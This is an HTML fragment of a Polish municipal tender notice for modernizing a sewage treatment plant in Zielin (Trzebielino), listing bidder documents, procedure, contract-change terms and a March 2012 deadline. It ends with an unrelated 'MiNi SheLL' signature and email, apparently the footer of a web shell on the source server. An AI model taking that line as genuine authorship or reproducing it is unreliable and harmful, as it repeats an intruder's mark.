<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) 	formularz ofertowy - załącznik nr 1
b) 	oświadczenie z  art. 22 ust.1 ustawy - zał. nr 2 
c) 	oświadczenia o braku podstaw do wykluczenia - zał. 3
d) 	oświadczenia o braku podstaw do wykluczenia - zał. 3a
e) 	formularz Wykaz wykonanych  robót - zał. nr 4
f) 	wykaz osób - zał. nr 5
g) 	oświadczenie o posiadaniu uprawnień - zał. nr 6</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalna jest zmiana istotnych postanowień zawartej umowy oraz wprowadzenie nowych istotnych postanowień w stosunku do treści oferty, z wyjątkiem:
       - zmiany wysokości wynagrodzenia Wykonawcy na skutek:
                       a/    zmiany stawki podatku VAT. 	
                              Zmiana wysokości wynagrodzenia może ulec zmianie o procentowy wzrost      wartości podatku VAT 
       - zmiany przedstawiciela ze strony Zamawiającego, zmiany osoby po stronie Wykonawcy  odpowiedzialnych za realizację przedmiotu zamówienia,
       - zmiana rozwiązań projektowych i materiałowych uzasadniona przez Wykonawcę   skutkująca zastosowaniem materiałów o parametrach nie gorszych niż przewidziane        w projekcie,
       - zmiany w danych podmiotowych oraz rachunku bankowym Wykonawcy,
       - zmiany terminu realizacji zamówienia z uwagi na:
             a/ warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie   robót  
             b/ zmiany będące następstwem okoliczności leżących po stronie Zamawiającego polegające na wstrzymaniu robót, koniecznością usunięcia błędów lub wprowadzeniem zmian projektowych, odmową wydania przez podmioty wymaganych decyzji, zezwoleń, uzgodnień.
         Termin realizacji zadania może zostać przesunięty o ilość dni uniemożliwiających wykorzystanie robót budowlanych w związku z w/w okolicznościami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.trzebielino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych w Trzebielinie , 77-235 Trzebielino 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2012 godzina 09:45, miejsce: Zakład Usług Komunalnych w Trzebielinie , 77-235 Trzebielino 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane i współfinansowane z udziałem środków Europejskiego Funduszu Rolnego w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013; Projekt pn. Modernizacja i rozbudowa oczyszczalni ścieków Zielin..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com